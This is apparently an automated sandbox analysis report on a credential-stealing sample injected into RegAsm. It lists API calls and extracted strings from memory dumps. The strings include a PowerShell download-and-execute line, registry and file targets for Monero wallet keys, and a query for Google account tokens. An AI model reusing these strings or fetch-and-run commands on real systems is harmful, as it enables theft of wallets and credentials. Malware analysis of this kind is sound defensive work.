                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                • API String ID: 585178538-186952963
                                                                                                                                                                                                • Opcode ID: b320b2290c2ed4de86da97ffb2adf623fffe1fcda058c910bc0b37f781464592
                                                                                                                                                                                                • Instruction ID: 9ecd63cdeb7db8a61a94a24a18639f88c6bdacdaded08a3f6ee19dfbbe3e3d40
                                                                                                                                                                                                • Opcode Fuzzy Hash: b320b2290c2ed4de86da97ffb2adf623fffe1fcda058c910bc0b37f781464592
                                                                                                                                                                                                • Instruction Fuzzy Hash: E9D15EB0801248EADB05EBE2C956FDDBBB8AF15308F5044AEE545731C2DB781B18DB76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                                                                                                                                                                • API String ID: 0-1047910854
                                                                                                                                                                                                • Opcode ID: f34e9dfc98a6c8a3a314860764c6224638df87583013990de40d5b6703e7763c
                                                                                                                                                                                                • Instruction ID: 1ed7747d37408d4aa1c49579777836e2a6f4bce294278fbcb21e5b3adbf2f919
                                                                                                                                                                                                • Opcode Fuzzy Hash: f34e9dfc98a6c8a3a314860764c6224638df87583013990de40d5b6703e7763c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86519C7A5002007AFB105B28FC42FFE7B66DFC6329F34025DF94547682FB67A55642A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
                                                                                                                                                                                                • API String ID: 0-1763475469
                                                                                                                                                                                                • Opcode ID: cfb7e22c006e2c807542c7918f148a1b48c351897e3256e215b4b7555e8d694d
                                                                                                                                                                                                • Instruction ID: 085640a4cbca69a8cfe42827d89b64b38abc0ef0b980d8805081b6fc83ad3d14
                                                                                                                                                                                                • Opcode Fuzzy Hash: cfb7e22c006e2c807542c7918f148a1b48c351897e3256e215b4b7555e8d694d
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5719278808386DBD704CF24D840B9BBBE4FFA8704F008A5EF99997241E775E549CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040E67D
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040E693
                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040E6B5
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E6F7
                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040E830
                                                                                                                                                                                                  • Part of subcall function 0040D1D6: strlen.MSVCRT ref: 0040D1ED
                                                                                                                                                                                                  • Part of subcall function 0040CD90: memcpy.MSVCRT ref: 0040CDB0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E70F, 0040E7F8
                                                                                                                                                                                                • N0ZWFt, xrefs: 0040E79A, 0040E7A7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                                                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                • API String ID: 3050127167-1622206642
                                                                                                                                                                                                • Opcode ID: 701ba4fa2b1a171a60f3fb8e5d521b8617fd806ba654350b00242465403191ad
                                                                                                                                                                                                • Instruction ID: 839985bfb7f102bcbe3af91687aa45d7aa919cac8a527869c7fc28f0c9758264
                                                                                                                                                                                                • Opcode Fuzzy Hash: 701ba4fa2b1a171a60f3fb8e5d521b8617fd806ba654350b00242465403191ad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22518F71D04219AEDB14EB91DC82AEEBBB9EF04314F20057EF104B72C1DB785E948B59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 205c74e4c884be0eda76af671c4c159afdd2d18b7ba678e284a3c9e1021343f4
                                                                                                                                                                                                • Instruction ID: 33a14e2a5db6c5dc410bd436a1b71204d6af721b936652765011b8a977176d47
                                                                                                                                                                                                • Opcode Fuzzy Hash: 205c74e4c884be0eda76af671c4c159afdd2d18b7ba678e284a3c9e1021343f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06B1F0B5E003459BFB108F24DC46BDF77A8AF94317F04492CE9968B3A1E775E44887A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: JSON path error near '%q'$malformed JSON
                                                                                                                                                                                                • API String ID: 0-560895927
                                                                                                                                                                                                • Opcode ID: 793a1a69116082c25487b29baad578ad72e2b69d4091d8ab143b7b8c6bda3048
                                                                                                                                                                                                • Instruction ID: 1efddd112fe1bfa709b782c4c66d4232d4f05e5cb5b84316d43487655c34d5cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 793a1a69116082c25487b29baad578ad72e2b69d4091d8ab143b7b8c6bda3048
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA18CB1A003019BDB14CF24D945BE6BBE0EF80305F14C52DE5858B342EB36E94ACBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %Q.$=%Q$PRAGMA
                                                                                                                                                                                                • API String ID: 0-2099833060
                                                                                                                                                                                                • Opcode ID: c66632ab4d62db9307493aa41e909b56473397b1398967f7854cfe7bae6d8a3f
                                                                                                                                                                                                • Instruction ID: 176d6a21409dab7f890fe61640c949827919f182da3b9905dea6d45277d2cd7c
                                                                                                                                                                                                • Opcode Fuzzy Hash: c66632ab4d62db9307493aa41e909b56473397b1398967f7854cfe7bae6d8a3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: F87105799043019BDB00DF24DC85BDBB7A8AF94B15F04896DFC859B341D335EA49CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00401C70
                                                                                                                                                                                                • memset.MSVCRT ref: 00401C8E
                                                                                                                                                                                                  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                  • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                  • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                • memset.MSVCRT ref: 00401E9D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                • API String ID: 1518627966-218353709
                                                                                                                                                                                                • Opcode ID: b546d9b61220f5c2c2ebf37daa28290af55609e5586465d455a554e70a57de66
                                                                                                                                                                                                • Instruction ID: 74627ad0a19d4cd4a401f8f025dee815ee59ebe6216bd5f6572279d46b23df22
                                                                                                                                                                                                • Opcode Fuzzy Hash: b546d9b61220f5c2c2ebf37daa28290af55609e5586465d455a554e70a57de66
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA716CB1D00248AADB04EBE5D846FDDBBB8AF19308F14446EF545B31D2EB781718CB69
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 35f92ecb2627b60c19c78aae7684a3110ede191b5b1008896401a46510ffb368
                                                                                                                                                                                                • Instruction ID: c5e71f2508bfd23345cfb458f5035821de74e81fe894bf9ecb532a9bc0b19a39
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35f92ecb2627b60c19c78aae7684a3110ede191b5b1008896401a46510ffb368
                                                                                                                                                                                                • Instruction Fuzzy Hash: D08189748043829BDB018F30C9517EABBA0BFA5200F44CD6CE8D79B79AD735D996C782
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                • Instruction ID: d4147f8a7127cf494b3314631bdc4fd5b9b32beeab778344905c85bec403dc11
                                                                                                                                                                                                • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                • Instruction Fuzzy Hash: B651C375A043016BEB00EF14EC81BAFB7E8EF88715F40453DF98497241E739AE5987A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • block, xrefs: 1B511A90
                                                                                                                                                                                                • misuse, xrefs: 1B511B21
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B511B26
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B511B17
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-4016964285
                                                                                                                                                                                                • Opcode ID: 500e1a90a1e9c42f2d642bf8cd508aed1ec0e418815adfd0eb7f0ffd3bd2b340
                                                                                                                                                                                                • Instruction ID: b3c4a30e156d56651efd8ebcfd679563059808a1497fe97e2a0e14bd7be89a98
                                                                                                                                                                                                • Opcode Fuzzy Hash: 500e1a90a1e9c42f2d642bf8cd508aed1ec0e418815adfd0eb7f0ffd3bd2b340
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C1D2B1D002119FFB10DF26D884ADA7BA8FF54714F0585A9FC899F201E731D954CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407F18
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040813A
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040815F
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408249
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040825D
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                • API String ID: 832884763-1713091031
                                                                                                                                                                                                • Opcode ID: d72b6939c06a14bef754848363fa9dafce077152f944b84ac79f95e0184815bb
                                                                                                                                                                                                • Instruction ID: 25686ab6400ac8ecb5d7b03c8e8e1ed9899d309d5e80ea8562dc234810ff2347
                                                                                                                                                                                                • Opcode Fuzzy Hash: d72b6939c06a14bef754848363fa9dafce077152f944b84ac79f95e0184815bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3C17E71804248EACB05EBE6D955FEDBBB4AF19308F1044AEF442731C2DF791B18DA25
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                • API String ID: 0-1539118790
                                                                                                                                                                                                • Opcode ID: 08833c0286972de4f244b6ea21b9700f1a2939116c17ad878366eb01acb12afe
                                                                                                                                                                                                • Instruction ID: c73d62edbc66c866547ad38bd1bab4f33b5fe0e8cebb8b2636ae3a04152bae61
                                                                                                                                                                                                • Opcode Fuzzy Hash: 08833c0286972de4f244b6ea21b9700f1a2939116c17ad878366eb01acb12afe
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77910175A043009BCB049F19DC94BEBB7A1BB8A714F04852DF9899B350D73BE84ACB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                                                                                                                                                                • API String ID: 0-165706444
                                                                                                                                                                                                • Opcode ID: 9c23336a50122a9782f515bbbb17ec943573cd5c8130d37c0b7c9da49d8c0176
                                                                                                                                                                                                • Instruction ID: 308719755d87ffb50c5e0d4852b2f846ea79f8776c4b40046fa9bce40df9d192
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c23336a50122a9782f515bbbb17ec943573cd5c8130d37c0b7c9da49d8c0176
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C6146B5A003806BFF218FB0EC81FDB77AEEF91216F144469EC9496642E721E154C3B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                                                                                                                                                • API String ID: 0-1499782803
                                                                                                                                                                                                • Opcode ID: 137b8162fa76cb6918ecb140c27fe4497d10a56bfb2856aba45fd4260253d0cb
                                                                                                                                                                                                • Instruction ID: 002935d8cdfd81e9af8b0b686f0decd75acdea77ae72ad11c568d030d68f4c16
                                                                                                                                                                                                • Opcode Fuzzy Hash: 137b8162fa76cb6918ecb140c27fe4497d10a56bfb2856aba45fd4260253d0cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 13512B72A082109BDB04CF16DAC6BD677A4AF90254F15C86DFD898B306E736E845C771
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                • API String ID: 0-538076154
                                                                                                                                                                                                • Opcode ID: 0a97a5e63e243813dc7bf8a2b6428af072308b2d1ff2f0e35d1b0099f6867413
                                                                                                                                                                                                • Instruction ID: 15695934879877dd91a13dce3ee07cc4415ae502446452b0bd502a08d14a07f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a97a5e63e243813dc7bf8a2b6428af072308b2d1ff2f0e35d1b0099f6867413
                                                                                                                                                                                                • Instruction Fuzzy Hash: C8319B7590474CABFB111FE49C007DB7BAF9F85225F000A2DE891E2101E771EA059393
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                                                                                                                                • String ID: 0123456789ABCDEF
                                                                                                                                                                                                • API String ID: 1978830238-2554083253
                                                                                                                                                                                                • Opcode ID: 816881ed8d0e230d466643db59f852525868b97dae52142a6d260626a908fec4
                                                                                                                                                                                                • Instruction ID: c5e121148ab2dda4085b2c5b8fcab7a3083e30b94096a511279be86f07c38caa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 816881ed8d0e230d466643db59f852525868b97dae52142a6d260626a908fec4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5931DF72A00215AFDB04DFA9DC85AAF7BA9EF49350B00407AF911EB2D1DA78D905CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • out of memory, xrefs: 1B4C6F39, 1B4C6FA0
                                                                                                                                                                                                • misuse, xrefs: 1B4C6F6A
                                                                                                                                                                                                • invalid, xrefs: 1B4C6F4F
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6F54
                                                                                                                                                                                                • bad parameter or other API misuse, xrefs: 1B4C6F7E
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6F6F
